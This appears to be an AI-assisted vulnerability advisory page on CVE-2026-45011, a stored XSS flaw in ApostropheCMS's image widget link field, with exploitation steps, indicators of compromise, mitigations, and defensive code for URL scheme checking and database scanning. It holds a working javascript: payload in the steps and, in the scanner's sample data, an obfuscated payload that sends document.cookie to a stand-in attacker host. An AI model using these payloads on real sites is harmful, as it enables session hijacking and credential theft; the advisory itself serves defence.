CVE-2026-45011
JavaScript vulnerability analysis and mitigation

Overview

CVE-2026-45011 is a stored cross-site scripting (XSS) vulnerability in ApostropheCMS's image widget functionality that allows users with the Editor role to inject malicious javascript: URL payloads into published page content. The vulnerability was published on May 13, 2026, and affects ApostropheCMS version 4.29.0 (npm package apostrophe). As of the advisory, no patched version has been released. It carries a CVSS v3.1 base score of 7.3 (High) (GitHub Advisory).

Technical details

The root cause is improper neutralization of user-supplied input (CWE-79) combined with improper encoding or escaping of output (CWE-116) in the image widget's link field. When an Editor sets the "Link to" field of an image widget to a URL using the javascript: scheme, the application neither validates the scheme against an allow-list nor rejects the dangerous protocol before storing and rendering the value. Note that ordinary HTML attribute escaping does not help here: a javascript: URL contains no HTML-significant characters, so it survives escaping intact and the browser honours the scheme as soon as the anchor is clicked. The link must therefore be validated server-side (and the scheme checked after normalizing case, whitespace and control characters, since browsers strip those before reading it), not merely encoded. Because no such check exists, the payload is persisted in the CMS database and rendered as a clickable hyperlink on the live page. Exploitation requires only low privileges (Editor role) and user interaction (a victim clicking the image link) (GitHub Advisory, ApostropheCMS Advisory).
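The following is an added illustration of the flaw and its fix; it is example code written for this page, not ApostropheCMS's own rendering code, and the widget shape ({ link, src, alt }), the function names and the allow-list are assumptions. The vulnerable render interpolates the stored link unchecked; the hardened render normalizes the value the way a browser does, allow-lists the scheme, escapes every interpolated value and falls back to an unlinked image when the URL is rejected.

```javascript
// Added illustrative example (not ApostropheCMS code): a render path that
// interpolates an editor-supplied link unchecked, beside a hardened version
// that allow-lists URL schemes before emitting the <a href>.

// Escape the five HTML-significant characters for use inside an attribute
// or text node. Escaping alone does NOT stop javascript: URLs, because the
// payload contains none of these characters and the scheme is honoured by
// the browser once the anchor is clicked.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// VULNERABLE (illustrative): the stored link is rendered as-is, so
// "javascript:alert(document.domain)" becomes a live, clickable payload.
function renderImageLinkVulnerable(widget) {
  return `<a href="${widget.link}"><img src="${widget.src}" alt="${widget.alt}"></a>`;
}

// Normalise the way a browser does before it reads the scheme: drop ASCII
// control characters and spaces (tab, newline and carriage return are
// ignored inside a URL, so "java\tscript:" is still javascript), then
// lowercase. Stripping every space is deliberately conservative: a
// relative URL with an embedded space may be mis-read as having a scheme,
// which fails safe (it is rejected).
function extractScheme(href) {
  const cleaned = String(href).replace(/[\u0000-\u0020]/g, "").toLowerCase();
  const m = /^([a-z][a-z0-9+.-]*):/.exec(cleaned);
  return m ? m[1] : null; // null: relative or scheme-less URL
}

// Assumed allow-list for this example; adjust to what the site needs.
const ALLOWED_SCHEMES = new Set(["http", "https", "mailto", "tel"]);

// Allow-list, not deny-list: anything with a scheme outside the list
// (javascript, data, vbscript, blob, ...) is rejected. Scheme-less
// (relative) URLs are accepted.
function isSafeHref(href) {
  if (typeof href !== "string" || href.length === 0) return false;
  const scheme = extractScheme(href);
  return scheme === null || ALLOWED_SCHEMES.has(scheme);
}

// HARDENED: validate the scheme server-side, escape every interpolated
// value, and fall back to an unlinked image when the URL is rejected.
function renderImageLinkSafe(widget) {
  const img = `<img src="${escapeHtml(widget.src)}" alt="${escapeHtml(widget.alt)}">`;
  if (!isSafeHref(widget.link)) return img;
  return `<a href="${escapeHtml(widget.link)}">${img}</a>`;
}

// Constructed sample widget, as an Editor would save it via the UI.
const PROBE_WIDGET = {
  link: "javascript:alert(document.domain)",
  src: "/uploads/probe-image.jpg",
  alt: "Probe image",
};
```

Note that protocol-relative links (//host/path) carry no scheme and are accepted by isSafeHref; if the site never needs them, treat a leading "//" as a rejection too. The same check belongs at save time as well as at render time, so that a payload is never persisted in the first place.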

Impact

Successful exploitation enables an attacker with Editor-level access to execute arbitrary JavaScript in the browser of any user — including administrators and anonymous visitors — who clicks the malicious image link on the published page. This can result in session hijacking, theft of sensitive CMS credentials or data, unauthorized modification of page content or site configuration, and phishing attacks conducted within the trusted site's origin. The confidentiality and integrity impacts are rated High, though availability is unaffected (GitHub Advisory).

Exploitation steps

  1. Obtain Editor credentials: Acquire or compromise an account with the Editor (or Contributor) role on the target ApostropheCMS instance.
  2. Ensure an image exists: Log in as an Editor, open the media library, and upload a JPG or PNG image if none exists. Set a title (e.g., "Probe image") and publish it.
  3. Add a malicious image widget: Navigate to the target page, enable edit mode, click "Add content," and select the Image widget. Choose the uploaded image from the picker.
  4. Inject the payload: Open the image widget settings, locate the "Link to" field, change it to "URL," and enter the payload: javascript:alert(document.domain) (or a more harmful payload such as a cookie-stealing script).
  5. Publish the page: Save the widget and publish the page, making the malicious link live on the site.
  6. Trigger execution: When any user (administrator, editor, or public visitor) visits the page and clicks the linked image, the JavaScript payload executes in their browser context.
  7. Escalate impact: Use the executed payload to steal session cookies, perform actions as the victim, exfiltrate CMS data, or redirect users to phishing pages (ApostropheCMS Advisory).

Indicators of compromise

  • Logs: CMS audit logs showing an Editor or Contributor modifying an image widget's link field to a value beginning with javascript:, data:, or another non-HTTP scheme. Match case-insensitively and ignore leading whitespace and embedded tab, newline and carriage-return characters, since browsers strip those before reading the scheme ("JaVaScRiPt:" and "java<TAB>script:" both execute).
  • Database: Stored widget configuration records in the ApostropheCMS database whose URL/link fields for image widgets contain a javascript: (or data:) scheme, again allowing for case and whitespace variants rather than searching for the literal lowercase prefix only.
  • Network: Browser-side network requests to unexpected external domains (e.g., attacker-controlled servers) originating from CMS pages, potentially indicating cookie exfiltration or beacon calls triggered by the XSS payload.
  • Browser/Application Logs: JavaScript errors or unexpected alert() dialogs reported by users on published pages containing image widgets.
  • File System: No direct file system artifacts expected, as the payload is stored in the database rather than on disk (ApostropheCMS Advisory).

Mitigation and workarounds

As of the advisory date, no patched version of the apostrophe npm package has been released; the affected version is 4.29.0 with "Patched versions: None" listed. Site administrators should immediately audit all image widget configurations for javascript: or data: URL schemes in link fields, including case and whitespace variants, and remove any suspicious entries. As a workaround, restrict the Editor role to trusted users only, and deploy a strict Content Security Policy (CSP) header (e.g., script-src 'self') to reduce the impact of any XSS execution. One caveat: CSP blocks javascript: URL navigation only when script-src does not include 'unsafe-inline'; if the site's own pages depend on inline scripts, allow them with nonces or hashes rather than 'unsafe-inline', which would re-enable the payload. Monitor the ApostropheCMS releases page for a patched version and upgrade as soon as one is available (GitHub Advisory, ApostropheCMS Advisory).
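The database indicator above and the audit recommended here call for the same thing: a scan of stored widget documents that flags link values whose effective scheme is dangerous. The block below is an added example written for this page, not a tool shipped with ApostropheCMS; the document shape (pages with a "main" area holding "items", image widgets with "linkTo"/"linkUrl" fields) and the sample documents are constructed and only loosely mirror a real CMS export, so the walk must be adapted to the actual dump (for instance a mongoexport of the content collection).

```javascript
// Added example (not ApostropheCMS code): walk exported CMS documents and
// report every string whose effective URL scheme is dangerous, with the
// JSON path and owning document so the widget can be located and cleaned.

const DANGEROUS_SCHEMES = new Set(["javascript", "data", "vbscript", "blob"]);

// Same normalisation a browser applies before reading the scheme: strip
// control characters and spaces anywhere, then lowercase. A literal search
// for "javascript:" would miss " JaVaScRiPt:" and "java\nscript:".
function effectiveScheme(value) {
  const cleaned = String(value).replace(/[\u0000-\u0020]/g, "").toLowerCase();
  const m = /^([a-z][a-z0-9+.-]*):/.exec(cleaned);
  return m ? m[1] : null;
}

// Recursive walk over arrays and objects. Every string value is checked,
// not just fields named "link" or "url": the check is cheap and a widget
// schema may store the URL under any key.
function walk(node, path, docId, findings) {
  if (Array.isArray(node)) {
    node.forEach((item, i) => walk(item, `${path}[${i}]`, docId, findings));
  } else if (node && typeof node === "object") {
    for (const [key, value] of Object.entries(node)) {
      if (typeof value === "string") {
        const scheme = effectiveScheme(value);
        if (scheme && DANGEROUS_SCHEMES.has(scheme)) {
          findings.push({
            docId,
            path: `${path}.${key}`,
            widgetType: node.type ?? null,
            scheme,
            value: value.slice(0, 80), // truncated for the report
          });
        }
      } else {
        walk(value, `${path}.${key}`, docId, findings);
      }
    }
  }
}

// Entry point: docs is an array of exported CMS documents (plain objects).
function scanDocuments(docs) {
  const findings = [];
  docs.forEach((doc, i) => walk(doc, `$[${i}]`, doc._id ?? null, findings));
  return findings;
}

// Constructed sample export (field names assumed for the example):
// one clean page and one page carrying two obfuscated javascript: links.
const SAMPLE_DOCS = [
  {
    _id: "page-home", type: "default-page", slug: "/",
    main: { items: [
      { type: "image", linkTo: "url", linkUrl: "https://example.com/promo",
        _image: [{ attachment: { name: "hero" } }] },
      { type: "rich-text", content: "<p>Welcome</p>" },
    ] },
  },
  {
    _id: "page-about", type: "default-page", slug: "/about",
    main: { items: [
      { type: "image", linkTo: "url",
        linkUrl: "  JaVaScRiPt:fetch('https://attacker.invalid/?c='+document.cookie)" },
      { type: "image", linkTo: "url",
        linkUrl: "java\nscript:alert(document.domain)" },
    ] },
  },
];

// Example run: prints one line per finding.
for (const f of scanDocuments(SAMPLE_DOCS)) {
  console.log(`${f.docId} ${f.path} [${f.widgetType}] scheme=${f.scheme} value=${JSON.stringify(f.value)}`);
}
```

Run the scan against draft as well as published documents, since a payload may sit unpublished waiting for a later publish. A finding is a pointer, not a verdict: open the widget, confirm the link, remove it, and then pull the audit log for the account that saved it.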

Community reactions

The advisory was published by boutell (an ApostropheCMS maintainer) on May 13, 2026, and the vulnerability was reported by security researcher MuhammadUwais. No significant broader media coverage, vendor statements beyond the advisory, or notable social media commentary has been identified at this time (ApostropheCMS Advisory).

Additional resources

Source

This report was generated with the help of AI.

Related JavaScript vulnerabilities:

CVE ID          Severity  Score  Technology  Component name      CISA KEV exploit  Fixed  Publication date
CVE-2026-44990  CRITICAL  9.3    JavaScript  sanitize-html       No                Yes    Jun 12, 2026
CVE-2026-45013  HIGH      8.1    JavaScript  apostrophe          No                No     Jun 12, 2026
CVE-2026-45012  HIGH      7.6    JavaScript  apostrophe          No                No     Jun 12, 2026
CVE-2026-45011  HIGH      7.3    JavaScript  apostrophe          No                No     Jun 12, 2026
CVE-2026-42853  MEDIUM    6.5    JavaScript  @apostrophecms/cli  No                No     Jun 12, 2026
